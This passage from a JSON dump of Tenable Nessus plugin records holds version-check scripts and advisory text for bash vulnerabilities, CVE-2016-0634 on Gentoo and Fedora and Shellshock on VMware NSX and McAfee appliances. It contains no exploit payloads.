audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-shells/bash\", unaffected:make_list(\"ge 4.3_p46-r1\"), vulnerable:make_list(\"lt 4.3_p46-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Bash\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:40", "description": "Security fix for CVE-2016-0634.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-15T00:00:00", "type": "nessus", "title": "Fedora 25 : bash (2016-eda100d886)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-EDA100D886.NASL", "href": "https://www.tenable.com/plugins/nessus/94876", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-eda100d886.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94876);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-0634\");\n script_xref(name:\"FEDORA\", value:\"2016-eda100d886\");\n\n script_name(english:\"Fedora 25 : bash (2016-eda100d886)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-0634.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-eda100d886\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"bash-4.3.43-3.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:40:04", "description": "Security fix for CVE-2016-0634.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-27T00:00:00", "type": "nessus", "title": "Fedora 23 : bash (2016-62e6c462ef)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-62E6C462EF.NASL", "href": "https://www.tenable.com/plugins/nessus/93725", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-62e6c462ef.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93725);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-0634\");\n script_xref(name:\"FEDORA\", value:\"2016-62e6c462ef\");\n\n script_name(english:\"Fedora 23 : bash (2016-62e6c462ef)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-0634.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-62e6c462ef\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"bash-4.3.42-4.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:40:04", "description": "Security fix for CVE-2016-0634.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-27T00:00:00", "type": "nessus", "title": "Fedora 24 : bash (2016-a822b472c4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-A822B472C4.NASL", "href": "https://www.tenable.com/plugins/nessus/93728", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-a822b472c4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93728);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-0634\");\n script_xref(name:\"FEDORA\", value:\"2016-a822b472c4\");\n\n script_name(english:\"Fedora 24 : bash (2016-a822b472c4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-0634.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-a822b472c4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"bash-4.3.42-6.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-07T18:59:31", "description": "The version of VMware NSX installed on the remote host is 4.x prior to 4.0.5 / 4.1.4 / 4.2.1 or 6.x prior to 6.0.7 / 6.1.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "VMware NSX Bash Environment Variable Command Injection (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:vmware:nsx"], "id": "VMWARE_NSX_VMSA_2014_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78826", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78826);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware NSX Bash Environment Variable Command Injection (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware NSX installed on the remote host is 4.x prior to\n4.0.5 / 4.1.4 / 4.2.1 or 6.x prior to 6.0.7 / 6.1.1. It is, therefore,\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/blogs/766093/posts/1976383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware NSX version 4.0.5 / 4.1.4 / 4.2.1 / 6.0.7 / 6.1.1 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:nsx\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_nsx_installed.nbin\");\n script_require_keys(\"Host/VMware NSX/Product\", \"Host/VMware NSX/Version\", \"Host/VMware NSX/Build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nproduct = get_kb_item_or_exit(\"Host/VMware NSX/Product\");\nversion = get_kb_item_or_exit(\"Host/VMware NSX/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware NSX/Build\");\nproduct_name = \"VMware NSX \" + product;\n\nfix = '';\n\nif (version =~ '^4\\\\.0\\\\.' && int(build) < '39236') fix = '4.0.5 Build 39236';\nelse if (version =~ '^4\\\\.1\\\\.' && int(build) < '39250') fix = '4.1.4 Build 39250';\nelse if (version =~ '^4\\\\.2\\\\.' && int(build) < '39256') fix = '4.2.1 Build 39256';\nelse if (version =~ '^6\\\\.0\\\\.' && int(build) < '2176282') fix = '6.0.7 Build 2176282';\nelse if (version =~ '^6\\\\.1\\\\.' && int(build) < '2179522') fix = '6.1.1 Build 2179522';\nelse audit(AUDIT_INST_VER_NOT_VULN, product_name, version, build);\n\nreport =\n '\\n Installed product : ' + product_name +\n '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fix + \n '\\n';\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T19:00:05", "description": "The remote host has a version of McAfee Next Generation Firewall (NGFW) installed that is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-13T00:00:00", "type": "nessus", "title": "McAfee Next Generation Firewall GNU Bash Code Injection (SB10085) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:mcafee:ngfw"], "id": "MCAFEE_NGFW_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79234", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79234);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"McAfee Next Generation Firewall GNU Bash Code Injection (SB10085) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Next Generation Firewall\n(NGFW) installed that is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:ngfw\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_ngfw_version.nbin\");\n script_require_keys(\"Host/McAfeeNGFW/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Next Generation Firewall\";\nversion = get_kb_item_or_exit(\"Host/McAfeeNGFW/version\");\n\n# Determine fix.\nif (\n version =~ \"^[2-4]\\.\" ||\n version =~ \"^5\\.[0-3]\\.\"\n) fix = \"5.3.11.9128\";\nelse if (version =~ \"^5\\.[45]\\.\") fix = \"5.5.11.9904\";\nelse if (version =~ \"^5\\.7\\.\") fix = \"5.7.5.11048\";\nelse if (version =~ \"^5\\.8\\.\") fix = \"5.8.0.12042\";\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T19:01:28", "description": "The remote host has a version of McAfee Email Gateway (MEG) installed that is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-11T00:00:00", "type": "nessus", "title": "McAfee Email Gateway GNU Bash Code Injection (SB10085) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:mcafee:email_gateway"], "id": "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79123", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79123);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"McAfee Email Gateway GNU Bash Code Injection (SB10085) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Email Gateway (MEG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n 